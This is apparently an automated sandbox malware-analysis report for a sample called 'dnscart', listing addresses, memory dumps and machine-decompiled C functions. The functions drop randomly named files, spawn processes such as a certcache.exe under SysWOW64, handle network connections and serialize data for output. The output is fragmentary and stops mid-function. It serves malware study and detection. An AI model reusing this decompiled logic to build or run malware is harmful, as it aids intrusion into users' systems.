    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00223224
    0x0022319e
    0x0022319e
    0x0022319e
    0x002231a5
    0x002231a8
    0x002231a8
    0x0022319c
    0x00223194
    0x00224fea
    0x00224fed
    0x00224ff0
    0x00225253
    0x00225253
    0x0022525a
    0x0022525d
    0x00224ff6
    0x00224ff6
    0x00224fff
    0x002250a6
    0x002250b1
    0x002250b7
    0x002250bf
    0x002250c2
    0x002250c4
    0x00000000
    0x002250ca
    0x002250ca
    0x002250dc
    0x002250e0
    0x00000000
    0x002250e6
    0x002250ea
    0x002251c1
    0x002251c1
    0x002251c7
    0x00225226
    0x00225232
    0x00000000
    0x002251c9
    0x002251c9
    0x002251cc
    0x002251cf
    0x00225210
    0x0022521e
    0x00225235
    0x00225237
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x002251d1
    0x002251d1
    0x002251d1
    0x002251d8
    0x002251db
    0x00225275
    0x002251cf
    0x002250f0
    0x002250f0
    0x002250f4
    0x00225196
    0x0022519f
    0x002251ab
    0x002251b4
    0x002251b9
    0x00000000
    0x002251bf
    0x00225239
    0x00225242
    0x0022524b
    0x002250d6
    0x002250d9
    0x00000000
    0x002250d9
    0x002250fa
    0x002250fa
    0x002250fa
    0x00225100
    0x0022515f
    0x0022516b
    0x00000000
    0x00225102
    0x00225102
    0x00225105
    0x00225108
    0x00225149
    0x00225157
    0x0022516e
    0x00225170
    0x00000000
    0x00225172
    0x00225180
    0x00225189
    0x00225190
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00225190
    0x0022510a
    0x0022510a
    0x0022510a
    0x00225111
    0x00225114
    0x00225277
    0x00225108
    0x00225100
    0x002250f4
    0x002250ea
    0x002250e0
    0x00225005
    0x00225005
    0x00225005
    0x0022500b
    0x0022506a
    0x00225076
    0x00000000
    0x0022500d
    0x0022500d
    0x00225010
    0x00225013
    0x00225054
    0x00225062
    0x00225079
    0x0022507b
    0x00000000
    0x0022507d
    0x0022508b
    0x00225094
    0x002250a0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x002250a0
    0x00225015
    0x00225015
    0x00225015
    0x0022501c
    0x0022501f
    0x00225279
    0x00225013
    0x0022500b
    0x00224fff
    0x00224ff0
    0x00224fe4
    0x002248e8
    0x00000000
    0x00000000
    0x00000000
    0x00224477
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00224de4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00222f58
    0x00225291
    0x00225291
    0x00225296
    0x00225297
    0x00000000
    0x00225297
    0x00225521
    0x00225525

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • CreateProcessAsUserW.ADVAPI32 ref: 00222220
    C-Code - Quality: 56%
    			E0022A658() {
    				void* _t22;
    				void* _t24;
    				void* _t26;
    
    				WriteFile();
    				CloseHandle(_t24);
    				memset(_t26 - 0x5c, 0, 0x44);
    				 *(_t26 - 0x5c) = 0x44;
    				if(CreateProcessW(_t26 - 0x320, 0, 0, 0, 0, 0, 0, 0, _t26 - 0x5c, _t26 - 0x18) != 0) {
    					CloseHandle( *(_t26 - 0x18));
    					_push( *((intOrPtr*)(_t26 - 0x14)));
    					CloseHandle();
    				}
    				HeapFree(GetProcessHeap(), 0, _t22);
    				return 0;
    			}







    APIs
    • WriteFile.KERNEL32 ref: 0022A658
    • CloseHandle.KERNEL32 ref: 0022A65F
    • memset.NTDLL ref: 0022A66D
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0022A69A
    • CloseHandle.KERNEL32(?), ref: 0022A6A7
    • CloseHandle.KERNEL32(?), ref: 0022A6B0
    • GetProcessHeap.KERNEL32(00000000), ref: 0022A6B9
    • HeapFree.KERNEL32(00000000), ref: 0022A6C0
    C-Code - Quality: 100%
    			E0022A6E0(void* __ecx) {
    				void* _t15;
    				void* _t22;
    				void _t25;
    				void* _t29;
    				void* _t31;
    				void* _t32;
    				void* _t33;
    
    				_t31 = __ecx;
    				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
    				_t33 = _t15;
    				if(_t33 == 0) {
    					return _t15;
    				} else {
    					 *_t33 =  *_t31;
    					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
    					_t4 = _t33 + 0x10; // 0x10
    					_t29 = _t4;
    					 *(_t33 + 8) = _t29;
    					 *(_t33 + 0xc) =  *(_t31 + 0xc);
    					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
    					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t32 == 0) {
    						L5:
    						return HeapFree(GetProcessHeap(), 0, _t33);
    					}
    					 *(_t32 + 4) =  *_t33;
    					_t22 = CreateThread(0, 0, 0x22a3f0, _t33, 0, 0);
    					 *(_t32 + 8) = _t22;
    					if(_t22 == 0) {
    						HeapFree(GetProcessHeap(), 0, _t32);
    						goto L5;
    					}
    					_t25 =  *0x22cbd4; // 0x0
    					 *_t32 = _t25;
    					 *0x22cbd4 = _t32;
    					return _t25;
    				}
    			}











    APIs
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0022A6ED
    • RtlAllocateHeap.NTDLL(00000000), ref: 0022A6F4
    • memcpy.NTDLL(00000010,?,?), ref: 0022A721
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0022A72E
    • RtlAllocateHeap.NTDLL(00000000), ref: 0022A735
    • CreateThread.KERNEL32(00000000,00000000,Function_0000A3F0,00000000,00000000,00000000), ref: 0022A754
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0022A774
    • HeapFree.KERNEL32(00000000), ref: 0022A77B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0022A784
    • HeapFree.KERNEL32(00000000), ref: 0022A78B
    C-Code - Quality: 26%
    			E0022A515(void* __edi, void* __eflags) {
    				void* _t32;
    				void* _t34;
    				void* _t35;
    				void* _t37;
    
    				_t32 = __edi;
    				WriteFile(??, ??, ??, ??, ??);
    				CloseHandle(_t34);
    				L00221830(0x221398, 4);
    				_t35 =  *(_t37 - 4);
    				 *0x22c20c(_t37 - 0x528, 0x104, _t35, _t37 - 0x320, 0x6e15c1da, _t37 - 4);
    				HeapFree(GetProcessHeap(), 0, _t35);
    				_push(_t37 - 0x18);
    				_push( *((intOrPtr*)(_t37 + 8)));
    				if(L002221B0(_t37 - 0x528, _t32) != 0) {
    					CloseHandle( *(_t37 - 0x18));
    					CloseHandle( *(_t37 - 0x14));
    				}
    				_push( *((intOrPtr*)(_t37 + 8)));
    				CloseHandle();
    				HeapFree(GetProcessHeap(), 0, _t32);
    				return 0;
    			}








    C-Code - Quality: 45%
    			E002216D3() {
    				void* __edi;
    				void* __esi;
    				int _t12;
    				void* _t13;
    
    				memset();
    				 *(_t13 - 0x58) = 0x44;
    				 *((intOrPtr*)(_t13 - 0x2c)) = 0x80;
    				_t12 = CreateProcessW(_t13 - 0x360, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x58, _t13 - 0x14);
    				if(_t12 == 0) {
    					goto 0x230044;
    					asm("int3");
    					asm("int3");
    					return _t12;
    				} else {
    					WaitForSingleObject(__esi, 0xffffffff);
    					CloseHandle( *(__ebp - 0x14));
    					CloseHandle( *(__ebp - 0x10));
    					CloseHandle(__esi);
    					CloseHandle(__edi);
    					_pop(__edi);
    					_pop(__esi);
    					_pop(__ebp);
    					return 1;
    				}
    			}








    APIs
    • memset.NTDLL ref: 002216D3
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00221707
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00221714
    • CloseHandle.KERNEL32(?), ref: 0022171D
    • CloseHandle.KERNEL32(?), ref: 00221726
    • CloseHandle.KERNEL32 ref: 0022172D
    • CloseHandle.KERNEL32 ref: 00221734
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • WTSGetActiveConsoleSessionId.KERNEL32 ref: 0022A420
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0022A5B5
    • GetTickCount.KERNEL32 ref: 0022A5BB
    • _snwprintf.NTDLL ref: 0022A60E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0022A61A
    • HeapFree.KERNEL32(00000000), ref: 0022A621
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0022A640
    • GetProcessHeap.KERNEL32(00000000), ref: 0022A6B9
    • HeapFree.KERNEL32(00000000), ref: 0022A6C0
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 26%
    			E0022A46E(void* __edi, void* __eflags) {
    				signed int _t22;
    				void* _t28;
    				void* _t59;
    				void* _t63;
    				void* _t64;
    				void* _t66;
    				void* _t67;
    
    				_t59 = __edi;
    				 *0x22c214();
    				_t22 = GetTickCount();
    				_t2 = (_t22 & 0x00000007) + 1; // 0x1
    				L00222270(_t67 - 0x98, _t2);
    				 *((short*)(_t67 + (_t22 & 0x00000007) * 2 - 0x96)) = 0;
    				L00221830(0x2215a4, 0xc);
    				_t63 =  *(_t67 - 4);
    				_t28 = _t67 - 0x320;
    				 *0x22c20c(_t28, 0x104, _t63, _t28, _t67 - 0x98, 0x6e15c1da, _t67 - 4);
    				HeapFree(GetProcessHeap(), 0, _t63);
    				_t64 = CreateFileW(_t67 - 0x320, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_t64 != 0xffffffff) {
    					goto 0x231e83;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					WriteFile();
    					CloseHandle(_t64);
    					L00221830(0x221398, 4);
    					_t66 =  *(_t67 - 4);
    					 *0x22c20c(_t67 - 0x528, 0x104, _t66, _t67 - 0x320, 0x6e15c1da, _t67 - 4);
    					HeapFree(GetProcessHeap(), 0, _t66);
    					_push(_t67 - 0x18);
    					_push( *((intOrPtr*)(_t67 + 8)));
    					if(L002221B0(_t67 - 0x528, _t59) != 0) {
    						CloseHandle( *(_t67 - 0x18));
    						CloseHandle( *(_t67 - 0x14));
    					}
    				}
    				_push( *((intOrPtr*)(_t67 + 8)));
    				CloseHandle();
    				HeapFree(GetProcessHeap(), 0, _t59);
    				return 0;
    			}

    APIs
    • SHGetFolderPathW.SHELL32 ref: 0022A46E
    • GetTickCount.KERNEL32 ref: 0022A474
    • _snwprintf.NTDLL ref: 0022A4C7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0022A4D3
    • HeapFree.KERNEL32(00000000), ref: 0022A4DA
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0022A4F9
    • CloseHandle.KERNEL32(?), ref: 0022A6B0
    • GetProcessHeap.KERNEL32(00000000), ref: 0022A6B9
    • HeapFree.KERNEL32(00000000), ref: 0022A6C0
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 58%
    			E002286C5(intOrPtr* __edi) {
    				void* _t24;
    				void* _t26;
    
    				HeapFree(GetProcessHeap(), ??, ??);
    				InternetCloseHandle( *(_t26 - 0x30));
    				InternetCloseHandle( *(_t26 - 0x34));
    				InternetCloseHandle( *(_t26 - 0x38));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t24);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *__edi != 0x00000000;
    			}

    APIs
    • GetProcessHeap.KERNEL32 ref: 002286C5
    • HeapFree.KERNEL32(00000000), ref: 002286CC
    • InternetCloseHandle.WININET(?), ref: 002286D5
    • InternetCloseHandle.WININET(?), ref: 002286DE
    • InternetCloseHandle.WININET(?), ref: 002286E7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002286F1
    • HeapFree.KERNEL32(00000000), ref: 002286F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00228701
    • HeapFree.KERNEL32(00000000), ref: 00228708
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00228C28
    • lstrlenW.KERNEL32(?), ref: 00228C35
    • lstrlenW.KERNEL32(00000004), ref: 00228C84
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00228CA0
    • RtlAllocateHeap.NTDLL(00000000), ref: 00228CA7
    • lstrcmpiW.KERNEL32(00000004,?), ref: 00228CC5
    • lstrcpyW.KERNEL32(00000000,00000004), ref: 00228CDA
    • lstrlenW.KERNEL32(00000004), ref: 00228CE4
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 34%
    			E002285DF(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __eflags) {
    				signed char* _t28;
    				void* _t30;
    				void _t49;
    				intOrPtr _t52;
    				void* _t53;
    				signed char* _t56;
    				void* _t58;
    				intOrPtr* _t64;
    				void* _t66;
    				void* _t67;
    				void* _t69;
    
    				_t64 = __edi;
    				_t53 = __ebx;
    				asm("scasb");
    				asm("int3");
    				L00221830(__ecx, __edx);
    				_t56 =  *0x22c298; // 0x0
    				_t66 =  *(_t69 + 8);
    				 *0x22c20c(_t69 - 0xb8, 0x40, _t66, _t56[3] & 0x000000ff, _t56[2] & 0x000000ff, _t56[1] & 0x000000ff,  *_t56 & 0x000000ff);
    				HeapFree(GetProcessHeap(), 0, _t66);
    				_t28 =  *0x22c298; // 0x0
    				_t61 = _t69 - 0xb8;
    				_push(_t56);
    				_t57 = _t69 - 0x38;
    				_push(_t28[4] & 0x0000ffff);
    				_t30 = L00221C50(_t69 - 0x38, _t69 - 0xb8, _t64);
    				_t67 =  *(_t69 - 8);
    				if(_t30 != 0) {
    					goto 0x23165c;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					if(L00221D40(_t57) != 0) {
    						goto 0x231674;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						if(L00221E80(_t41, _t57, _t61) != 0) {
    							goto 0x23168c;
    							asm("int3");
    							asm("int3");
    							if(L00222560(_t61, _t64) != 0) {
    								_t58 =  *(_t69 - 0x10);
    								_t49 =  *_t58;
    								 *_t53 = _t49;
    								if(_t49 < 0x4000000) {
    									_push(_t53);
    									_t52 = L00228500(_t58 + 4,  *((intOrPtr*)(_t69 - 0xc)) - 4, _t64);
    									_t58 =  *(_t69 - 0x10);
    									 *_t64 = _t52;
    								}
    								HeapFree(GetProcessHeap(), 0, _t58);
    							}
    							HeapFree(GetProcessHeap(), ??, ??);
    						}
    						InternetCloseHandle( *(_t69 - 0x30));
    					}
    					InternetCloseHandle( *(_t69 - 0x34));
    					InternetCloseHandle( *(_t69 - 0x38));
    				}
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t67);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t64 != 0x00000000;
    			}

    APIs
    • _snwprintf.NTDLL ref: 0022860C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00228618
    • HeapFree.KERNEL32(00000000), ref: 0022861F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002286F1
    • HeapFree.KERNEL32(00000000), ref: 002286F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00228701
    • HeapFree.KERNEL32(00000000), ref: 00228708
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 25%
    			E00229990() {
    				int _t10;
    				void* _t12;
    
    				memset();
    				 *(_t12 - 0x88) = 0x44;
    				 *((intOrPtr*)(_t12 - 0x5c)) = 0x80;
    				_t10 = CreateProcessW("C:\Windows\SysWOW64\certcache.exe", 0, 0, 0, 0, 0, 0, 0, _t12 - 0x88, _t12 - 0x30);
    				if(_t10 != 0) {
    					CloseHandle( *(_t12 - 0x30));
    					_t10 = CloseHandle( *(_t12 - 0x2c));
    				}
    				goto 0x231bae;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				return _t10;
    			}

    APIs
    • memset.NTDLL ref: 00229990
    • CreateProcessW.KERNEL32(C:\Windows\SysWOW64\certcache.exe,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 002299C8
    • CloseHandle.KERNEL32(?), ref: 002299D5
    • CloseHandle.KERNEL32(?), ref: 002299DE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 59%
    			E0022866C(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
    				void* _t10;
    				void _t28;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				intOrPtr* _t40;
    				void* _t42;
    				void* _t44;
    
    				_t40 = __edi;
    				_t32 = __ebx;
    				if(L00221E80(_t10, __ecx, __edx) != 0) {
    					goto 0x23168c;
    					asm("int3");
    					asm("int3");
    					if(L00222560(__edx, _t40) != 0) {
    						_t35 =  *(_t44 - 0x10);
    						_t28 =  *_t35;
    						 *_t32 = _t28;
    						if(_t28 < 0x4000000) {
    							_push(_t32);
    							_t31 = L00228500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
    							_t35 =  *(_t44 - 0x10);
    							 *_t40 = _t31;
    						}
    						HeapFree(GetProcessHeap(), 0, _t35);
    					}
    					HeapFree(GetProcessHeap(), ??, ??);
    				}
    				InternetCloseHandle( *(_t44 - 0x30));
    				InternetCloseHandle( *(_t44 - 0x34));
    				InternetCloseHandle( *(_t44 - 0x38));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t42);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t40 != 0x00000000;
    			}

    APIs
    • InternetCloseHandle.WININET(?), ref: 002286D5
    • InternetCloseHandle.WININET(?), ref: 002286DE
    • InternetCloseHandle.WININET(?), ref: 002286E7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002286F1
    • HeapFree.KERNEL32(00000000), ref: 002286F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00228701
    • HeapFree.KERNEL32(00000000), ref: 00228708
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 100%
    			E0022A037(unsigned int __eax, void* __ebx, void* __ecx, void* __edx, signed char* __edi) {
    				unsigned int _t31;
    				unsigned int _t32;
    				long _t41;
    				signed char _t52;
    				signed char _t54;
    				signed char _t56;
    				signed char _t58;
    				signed char _t60;
    				void* _t62;
    				intOrPtr* _t63;
    				int _t65;
    				int _t66;
    				int _t67;
    				void* _t68;
    				signed char _t69;
    				signed char _t71;
    				signed char _t73;
    				signed char _t75;
    				signed char _t77;
    				void* _t79;
    				void* _t80;
    				void* _t81;
    				void* _t82;
    				int _t83;
    				signed char* _t84;
    				void* _t86;
    				char* _t89;
    				signed char* _t91;
    				signed char* _t92;
    				void* _t93;
    				char* _t94;
    				signed char* _t95;
    				void* _t96;
    				char* _t97;
    				signed char* _t98;
    				void* _t99;
    				char* _t100;
    				signed char* _t101;
    				void* _t103;
    
    				_t84 = __edi;
    				_t79 = __edx;
    				_t68 = __ecx;
    				_t62 = __ebx;
    				_t31 = __eax;
    				if(__eax > 0x7f) {
    					do {
    						_t31 = _t31 >> 7;
    						_t62 = _t62 + 1;
    					} while (_t31 > 0x7f);
    				}
    				_t32 = _t84[0x28];
    				 *((intOrPtr*)(_t103 - 4)) = 1;
    				while(_t32 > 0x7f) {
    					 *((intOrPtr*)(_t103 - 4)) =  *((intOrPtr*)(_t103 - 4)) + 1;
    					_t32 = _t32 >> 7;
    				}
    				_t63 =  *((intOrPtr*)(_t103 - 0xc));
    				_t41 = _t84[0x28] + _t84[0x20] + _t84[0x18] + _t84[8] +  *((intOrPtr*)(_t103 - 4)) + _t62 + _t79 + _t68 +  *((intOrPtr*)(_t103 - 8)) + 0xf;
    				 *(_t63 + 4) = _t41;
    				_t89 = RtlAllocateHeap(GetProcessHeap(), 0, _t41);
    				 *_t63 = _t89;
    				if(_t89 != 0) {
    					 *_t89 = 8;
    					_t91 = _t89 + 1;
    					_t69 =  *_t84;
    					while(_t69 > 0x7f) {
    						_t60 = _t69;
    						_t69 = _t69 >> 7;
    						 *_t91 = _t60 | 0x00000080;
    						_t91 =  &(_t91[1]);
    					}
    					 *_t91 = _t69 & 0x0000007f;
    					_t91[1] = 0x12;
    					_t92 =  &(_t91[2]);
    					_t65 = _t84[8];
    					_t71 = _t65;
    					_t80 = _t84[4];
    					if(_t65 > 0x7f) {
    						do {
    							_t58 = _t71;
    							_t71 = _t71 >> 7;
    							 *_t92 = _t58 | 0x00000080;
    							_t92 =  &(_t92[1]);
    						} while (_t71 > 0x7f);
    					}
    					 *_t92 = _t71 & 0x0000007f;
    					_t93 =  &(_t92[1]);
    					memcpy(_t93, _t80, _t65);
    					_t94 = _t93 + _t65;
    					 *_t94 = 0x1d;
    					 *(_t94 + 1) = _t84[0xc];
    					 *((char*)(_t94 + 5)) = 0x25;
    					 *(_t94 + 6) = _t84[0x10];
    					 *((char*)(_t94 + 0xa)) = 0x2a;
    					_t95 = _t94 + 0xb;
    					_t66 = _t84[0x18];
    					_t73 = _t66;
    					_t81 = _t84[0x14];
    					if(_t66 > 0x7f) {
    						do {
    							_t56 = _t73;
    							_t73 = _t73 >> 7;
    							 *_t95 = _t56 | 0x00000080;
    							_t95 =  &(_t95[1]);
    						} while (_t73 > 0x7f);
    					}
    					 *_t95 = _t73 & 0x0000007f;
    					_t96 =  &(_t95[1]);
    					memcpy(_t96, _t81, _t66);
    					_t97 = _t96 + _t66;
    					 *_t97 = 0x32;
    					_t98 = _t97 + 1;
    					_t67 = _t84[0x20];
    					_t75 = _t67;
    					_t82 = _t84[0x1c];
    					if(_t67 > 0x7f) {
    						do {
    							_t54 = _t75;
    							_t75 = _t75 >> 7;
    							 *_t98 = _t54 | 0x00000080;
    							_t98 =  &(_t98[1]);
    						} while (_t75 > 0x7f);
    					}
    					 *_t98 = _t75 & 0x0000007f;
    					_t99 =  &(_t98[1]);
    					memcpy(_t99, _t82, _t67);
    					_t100 = _t99 + _t67;
    					 *_t100 = 0x3a;
    					_t101 = _t100 + 1;
    					_t83 = _t84[0x28];
    					_t77 = _t83;
    					_t86 = _t84[0x24];
    					if(_t83 > 0x7f) {
    						do {
    							_t52 = _t77;
    							_t77 = _t77 >> 7;
    							 *_t101 = _t52 | 0x00000080;
    							_t101 =  &(_t101[1]);
    						} while (_t77 > 0x7f);
    					}
    					 *_t101 = _t77 & 0x0000007f;
    					memcpy( &(_t101[1]), _t86, _t83);
    					_t63 =  *((intOrPtr*)(_t103 - 0xc));
    				}
    				return 0 |  *_t63 != 0x00000000;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,00000001), ref: 0022A091
    • RtlAllocateHeap.NTDLL(00000000), ref: 0022A098
    • memcpy.NTDLL(00000000,00000001,?), ref: 0022A0F8
    • memcpy.NTDLL(-0000000A,?,?), ref: 0022A148
    • memcpy.NTDLL(-00000008,?,?), ref: 0022A17C
    • memcpy.NTDLL(-00000006,?,?), ref: 0022A1B0
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 44%
    			E00228656(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
    				void _t28;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				void* _t37;
    				intOrPtr* _t40;
    				void* _t42;
    				void* _t44;
    
    				_t40 = __edi;
    				_t37 = __edx;
    				_t32 = __ebx;
    				if(L00221D40(__ecx) != 0) {
    					goto 0x231674;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					if(L00221E80(_t10, __ecx, _t37) != 0) {
    						goto 0x23168c;
    						asm("int3");
    						asm("int3");
    						if(L00222560(_t37, _t40) != 0) {
    							_t35 =  *(_t44 - 0x10);
    							_t28 =  *_t35;
    							 *_t32 = _t28;
    							if(_t28 < 0x4000000) {
    								_push(_t32);
    								_t31 = L00228500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
    								_t35 =  *(_t44 - 0x10);
    								 *_t40 = _t31;
    							}
    							HeapFree(GetProcessHeap(), 0, _t35);
    						}
    						HeapFree(GetProcessHeap(), ??, ??);
    					}
    					InternetCloseHandle( *(_t44 - 0x30));
    				}
    				InternetCloseHandle( *(_t44 - 0x34));
    				InternetCloseHandle( *(_t44 - 0x38));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t42);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t40 != 0x00000000;
    			}

    APIs
    • InternetCloseHandle.WININET(?), ref: 002286DE
    • InternetCloseHandle.WININET(?), ref: 002286E7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002286F1
    • HeapFree.KERNEL32(00000000), ref: 002286F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00228701
    • HeapFree.KERNEL32(00000000), ref: 00228708
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 27%
    			E0022992A() {
    				void* _t11;
    				void* _t13;
    				void* _t15;
    				void* _t17;
    
    				HeapFree(GetProcessHeap(), ??, ??);
    				if( *((intOrPtr*)(_t17 - 8)) != 0) {
    					 *0x22c088(_t15, 1, _t11);
